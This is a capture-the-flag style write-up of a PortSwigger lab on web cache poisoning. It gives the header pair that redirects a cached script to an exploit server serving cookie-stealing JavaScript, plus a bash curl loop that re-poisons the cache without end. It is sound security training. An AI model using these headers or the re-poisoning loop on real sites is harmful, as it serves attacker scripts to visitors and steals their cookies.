PortSwigger Lab: Web cache poisoning with multiple headers
Task
This lab contains a web cache poisoning vulnerability that is only exploitable when you use multiple headers to craft a malicious request. A user visits the home page roughly once a minute. To solve this lab, poison the cache with a response that executes alert(document.cookie)
in the visitor’s browser.
Attempt
Adding the headers below to /resources/js/tracking.js
and sent the request:
X-Forwarded-Host: example.com
X-Forwarded-Scheme: http
With this the response redirected to example.com
, indicating the cache poisoning vulnerability.
At the exploit server, host the js file with the same name and the path as /resources/js/tracking.js
and set the payload:
alert(document.cookie)
Set X-Forwarded-Host: exploit-EXPLOIT_ID.exploit-server.net
so that it will redirect to the exploit server. When testing cache poisoning, add a cache buster like /resources/js/tracking.js?cp=dakfejlsjtesojad
so it doesn’t affect the live website. The value of the parameter should be random so that it doesn’t get easily found by normal users.
To solve this lab, after confirming cache poisoning works, you need to cache poison the actual website by removing the cache buster.
Automatic cache re-poisoning
Sometimes some people say cache poisoning isn’t really critical because it only works for a short amount of time. But automatically re-poisoning the cache is easy as pie and you don’t need to send a huge amount of traffic.
#!/bin/bash
url="https://ID.web-security-academy.net/resources/js/tracking.js"
headers="-H 'X-Forwarded-Host: exploit-EXPLOIT_ID.exploit-server.net' -H 'X-Forwarded-Scheme: nothttps'"
while true; do
curl -s $url $headers > /dev/null
sleep 2
done
This simple bash script keeps re-poisoning the cache indefinitely.